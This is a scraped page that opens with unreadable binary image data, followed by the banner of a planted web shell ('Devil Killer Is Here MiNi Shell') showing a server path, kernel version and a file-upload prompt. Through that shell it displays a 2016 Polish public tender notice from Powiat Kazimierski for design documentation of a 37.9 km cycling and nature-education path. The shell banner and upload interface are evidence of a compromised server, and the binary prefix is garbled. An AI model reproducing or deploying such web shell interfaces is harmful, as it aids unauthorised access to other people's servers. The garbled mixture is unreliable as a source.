JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161221/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161221/371066-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://powiatkazimierza.wrota-swietokrzyskie.pl/70' target='_blank'>http://powiatkazimierza.wrota-swietokrzyskie.pl/70</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 371066 - 2016
              z dnia 2016-12-21 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Kazimierza Wielka: Opracowanie dokumentacji projektowej na budowę ścieżki edukacyjno-przyrodniczej jako asfaltowej drogi pieszo-rowerowej <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Działanie 4.5 Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata 2014-2020: Ochrona i wykorzystanie obszarów cennych przyrodniczo</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                tak
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br />Powiat Kazimierski (Lider) z siedzibą w Kazimierzy Wielkiej, ul. T. Kościuszki 12, 28-500 Kazimierza Wielka, tel. 413502318,
                <br />Gmina Kazimierza Wielka (Partner) z siedzibą w Kazimierzy Wielkiej, ul. Tadeusza Kościuszki 12, 25-500 Kazimierza Wielka, tel. 413521937,
                <br />Gmina Czarnocin (Partner) z siedzibą w Czarnocinie, Czarnocin 100, 28-506 Czarnocin, tel. 413512028,
                <br />Gmina Opatowiec (Partner) z siedzibą w Opatowcu, Opatowiec, Rynek 3, 28-520 Opatowiec, tel. 413518052,
                <br />Gmina Wiślica (Partner) z siedzibą w Wiślicy, ul. Okopowa 8, 28-160 Wiślica, tel. 413690900<br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Powiat Kazimierski, krajowy numer identyfikacyjny
              291009455, ul.
              Tadeusza Kościuszki 
              12,
              28-500 
              Kazimierza Wielka, woj.
              świętokrzyskie, państwo
              Polska, tel.
              (41)3502312, e-mail
              sebastian.cichy@powiat.kazimierzaw.pl, faks
              (41)3502313.
              <br />
              Adres strony internetowej (URL): <br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br />Odpowiedzialnym za przeprowadzenie postępowania jest Powiat Kazimierski a zamówienie zostanie udzielone w imieniu i na rzecz Partnerów na podstawie umowy partnerskiej o wspólnej realizacji zadania inwestycyjnego, zawartej w dniu 11 stycznia 2016 roku.</div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://powiatkazimierza.wrota-swietokrzyskie.pl/70</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://powiatkazimierza.wrota-swietokrzyskie.pl/70</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Starostwo Powiatowe w Kazimierzy Wielkiej, ul. T. Kościuszki 12, 28-500 Kazimierza Wielka<br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Opracowanie dokumentacji projektowej na budowę ścieżki edukacyjno-przyrodniczej jako asfaltowej drogi pieszo-rowerowej <br /><b>Numer referencyjny: </b>ZKSA.272.3.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest opracowanie dokumentacji projektowej na budowę ścieżki edukacyjno-przyrodniczej jako asfaltowej drogi pieszo - rowerowej o dł. 37,9 km, dot. inwestycji pod nazwą Zwiększenie edukacji ekologicznej oraz ograniczenie negatywnego oddziaływania turystyki na obszary cenne przyrodniczo na terenie Powiatu Kazimierskiego i Powiatu Buskiego, realizowanej w ramach działania 4.5 Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata 2014-2020: Ochrona i wykorzystanie obszarów cennych przyrodniczo uzyskanie dla Zamawiającego wszelkich niezbędnych dla realizacji przedsięwzięcia decyzji administracyjnych oraz pełnienie funkcji nadzoru autorskiego w toku realizacji przedsięwzięcia, podzielonej na dwa zadania: Zadanie 1  Obszar Natura2000 wraz z dwoma mostami oraz most w miejscowości Cudzynowice: a. Obszar inwestycji A zlokalizowany jest na obszarze Natura2000 na terenie powiatu buskiego w miejscowości Koniecmosty, od skrzyżowania drogi powiatowej nr 0073 z drogą wojewódzką nr 776, równolegle do drogi wojewódzkiej 776, do Rynku w Wiślicy. Obszar inwestycji B zlokalizowany jest w miejscowości Cudzynowice w powiecie kazimierskim i obejmuje most na rzece Nidzicy. b. Projekt drogi dla rowerów w pasie drogowym drogi wojewódzkiej nr 776 (na obszarze Natura2000) winien polegać na wprowadzeniu odpowiedniego oznakowania i niwelacji wysokich krawężników. Wskazany odcinek przebiega przez dwa mosty  nad rzeką Nidą oraz małym ciekiem wodnym dopływającym do rzeki Nidy) Projekt mostu na rzece Nidzicy w miejscowości Cudzynowice winien polegać na oczyszczeniu, odtłuszczeniu oraz konserwacji istniejącej konstrukcji metalowej. Następnie ułożeniu na istniejących belkach stalowych nowych belek poprzecznych co 1000 mm, a na nich dwóch belek podłużnych o długości 10 m oraz ułożeniu nowej nawierzchni z blachy ryflowanej o gr. 5 mm, co przy zachowaniu szerokości ścieżki 2,5 m daje powierzchnię blachy 25 m2, a także zamontowaniu balustrad mostowych o dł. 10 m i wys. 110 cm po obu stronach mostu. c. Zamówienie obejmuje odcinki: - Droga wojewódzka nr 776, - Przebieg: od skrzyżowania drogi powiatowej nr 0073 z drogą wojewódzką nr 776 w miejscowości Koniecmosty, równolegle do drogi wojewódzkiej 776, do Rynku w Wiślicy oraz most w
miejscowości Cudzynowice - Długość (objęta opracowaniem): ok. 1,1 km, Zadanie 2  Lekszyce  Cudzynowice  Koniecmosty: a. Obszar inwestycji C zlokalizowany jest na terenie powiatu kazimierskiego, w gminie Kazimierza Wielka, od granicy z województwem małopolskim w miejscowości Lekszyce do mostu na rzece Nidzicy w miejscowości Cudzynowice. Obszar inwestycji D zlokalizowany jest na terenie powiatu kazimierskiego oraz buskiego, od mostu na rzece Nidzicy w Cudzynowicach (gmina Kazimierza Wielka) do skrzyżowania drogi powiatowej nr 0073 z drogą wojewódzką nr 776 w miejscowości Koniecmosty (gmina Wiślica) b. Droga dla rowerów winna zostać zaprojektowana w pasie nieistniejącej kolejki wąskotorowej o łącznej długości ok. 31,8 km oraz po istniejących odcinkach dróg o łącznej długości ok. 5 km. Projekt powinien uwzględniać oznakowanie turystycznego szlaku, oznakowanie drogi, na której szlak został wytyczony, ustawienie wzdłuż ścieżki tablic informacyjno  edukacyjnych. Stan pasa kolejki wąskotorowej i znajdującej się w nim infrastruktury winien zostać zweryfikowany przez Wykonawcę w terenie. Wzdłuż planowanej trasy zostaną utworzone tzw. Miejsca Obsługi Rowerzystów (MOR). Obiekt MOR będzie stanowić wiata (altana) zabudowana z trzech stron (tył i boki) zapewniająca ochronę przed słońcem, deszczem i silnym wiatrem, wyposażoną w bezpłatną toaletę przenośną, a ponadto: dwie ławki, stół, tablicę informacyjną z mapą, dwa kosze na śmieci, stojak na rowery zlokalizowane na terenie o powierzchni minimum 40 m2. Możliwość oświetlenia MOR-ów z wykorzystaniem lamp ledowych. Oznakowanie trasy powinno składać się z dwóch elementów: oznakowania turystycznego szlaku, oznakowania drogi, na której szlak został wytyczony.<br /><br /><b>II.5) Główny kod CPV: </b>71220000-6<br /><b> Dodatkowe kody CPV:</b>71221000-3<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 7<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający w tym zakresie nie stawia żadnych wymagań.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający w tym zakresie nie stawia żadnych wymagań.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Na potwierdzenie niniejszego warunku należy złożyć wykaz usług wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz, których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wyko-nawcy;. 
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że;
Dla Zadania nr 1 
w tym okresie wykonał jedną dokumentację projektową, w ramach, której wykonano prace projektowe związane z budową ścieżki rowerowej położonej na obszarze NATURA2000 (lub innym równoważnym obszarze przyrodniczym prawnie chronionym) o długości minimum 1 km o wartości zrealizowanych robót budowlanych minimum 500 000,00 PLN brutto oraz wykonał jedną dokumentację projektową w ramach, której wykonano prace projektowe związane z budową lub przebudową lub remontem obiektu mostowego o wartości zrealizowanych robót budowlanych minimum 500 000,00 PLN brutto.

Dla Zadania nr 2
w tym okresie wykonał jedną dokumentację projektową, w ramach, której wykonano prace projektowe związane z budową ścieżki rowerowej o długości minimum 10 km o wartości zrealizowanych robót budowlanych minimum 2 500 000,00 PLN brutto
Do każdej pozycji wykazu należy załączyć dowody określające, czy usługi te zostały wykonane w sposób należyty.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                Na potwierdzenie niniejszego warunku należy złożyć wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje n/w osobami:
Dla Zadania nr 1 
	projektantem w specjalności inżynieryjnej drogowej - posiadającym uprawnienia budowlane uprawniające do projektowania w specjalności drogowej bez ograniczeń, co najmniej 3 letnie doświadczenie zawodowe w projektowaniu w danej specjalności od daty uzyskania wymaganych uprawnień budowlanych do projektowania. 
	projektantem w specjalności konstrukcyjno-budowlanej - posiadającym uprawnienia budowlane uprawniające do projektowania w specjalności konstrukcyjno-budowlanej bez ograniczeń, co najmniej 3 letnie doświadczenie zawodowe w projektowaniu w danej specjalności od daty uzyskania wymaganych uprawnień budowlanych do projektowania.
	projektantem w specjalności inżynieryjnej mostowej - posiadającym uprawnienia budowlane uprawniające do projektowania w specjalności inżynieryjnej mostowej bez ograniczeń, co najmniej 3 letnie doświadczenie zawodowe w projektowaniu w danej specjalności od daty uzyskania wymaganych uprawnień budowlanych do projektowania.
Wymagane powyżej trzy osoby łącznie lub dwóch lub jeden z wymienionych posiadają doświadczenie  polegające na zaprojektowaniu  minimum jednego projektu  związanego z budową, modernizacją lub remontem ścieżek rowerowych lub dróg na terenie NATURA 2000 lub innym równoważnym obszarze przyrodniczym prawem chronionym  i minimum jedną dokumentacje projektową związaną z budową, modernizacja lub remontem obiektu mostowego. Wymagane doświadczenie można wykazać w ramach jednej lub dwóch usług projektowych.

Dla Zadania nr 2
	projektantem w specjalności inżynieryjnej drogowej - posiadającym uprawnienia budowlane uprawniające do projektowania w specjalności drogowej bez ograniczeń, co najmniej 3 letnie doświadczenie zawodowe w projektowaniu w danej specjalności od daty uzyskania wymaganych uprawnień budowlanych do projektowania.
	projektantem w specjalności konstrukcyjno-budowlanej - posiadającym uprawnienia budowlane uprawniające do projektowania w specjalności konstrukcyjno-budowlanej bez ograniczeń, co najmniej 3 letnie doświadczenie zawodowe w projektowaniu w danej specjalności od daty uzyskania wymaganych uprawnień budowlanych do projektowania.
Wymagane powyżej osoby jedna lub druga z wymienionych posiadają doświadczenie  polegające na zaprojektowaniu  minimum jednego projektu  związanego z budową, modernizacją lub remontem ścieżek rowerowych lub dróg o długości minimum 10 km.

Do oferty należy dołączyć oświadczenie Wykonawcy, że zaproponowane osoby posiadają wymagane uprawnienia i przynależą do właściwej izby samorządu zawodowego, jeżeli taki wymóg na te osoby nakłada Prawo budowlane.

Zgodnie z art. 12a Prawa budowlanego, który to odsyła do ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z dnia 17 kwietnia 2008 r. ze zm.) przynależność do właściwej izby samorządu zawodowego nie jest wymagana od obywateli państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) gdyż do posiadania uprawnień w wykonywaniu samodzielnych funkcji w budownictwie nie jest wymagana przynależności do izby samorządu zawodowego.

	Tymi samymi osobami można wykazać się do obu zadań.
</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia na podstawie art. 24 ust. 5 pkt.1 ustawy<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Wadium w wysokości 3 000,00 PLN (słownie: trzy tysiące złotych) za każde z Zadań- należy wnieść przed upływem terminu składania ofert. Nr rachunku  45 8493 0004 0180 0130 0720 0005</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
